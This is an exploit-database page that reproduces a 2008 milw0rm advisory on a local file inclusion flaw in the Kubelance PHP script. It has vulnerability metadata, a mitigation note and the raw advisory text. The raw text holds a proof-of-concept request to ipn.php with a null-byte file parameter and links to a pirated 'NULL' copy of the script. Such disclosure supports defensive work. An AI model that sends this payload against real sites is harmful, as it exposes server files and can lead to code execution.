header-logo
Suggest Exploit
vendor:
Kubelance
by:
Crackers_Child
9.3
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Kubelance
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Kubelance All Versions Local File Inclusion Vulnerabilities

Kubelance All Versions is vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This can allow the attacker to include a local file, which can contain malicious code, and execute it on the vulnerable system.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file operations.
Source

Exploit-DB raw data:

$ Script        : Kubelance All Versions  Local File Inclusion Vulnerabilities

$ Script Info   : http://demos.kubelabs.com/kubelance/

$ Download      : http://rapidshare.com/files/108095194/Kubelance.v1.6.4.PHP.NULL-DGT.rar.html

$ Author        : Crackers_Child

$ Contact       : cashr00t@hotmail.com

$ Note          : Erbabi ile vurulduysak sirtimizdan neyleyelim.Bir Yarali Kurt Misali

$ Note          : Her Yanimiz it Tuzagi . . .

$ Username Exp  : www.x.com/script_path/ipn.php?i=localfile%00

$ Greetz        : Milw0rm.Com & All Peace Warriors 

# milw0rm.com [2008-04-20]

Navigation

Suggest Exploit

Services By CQR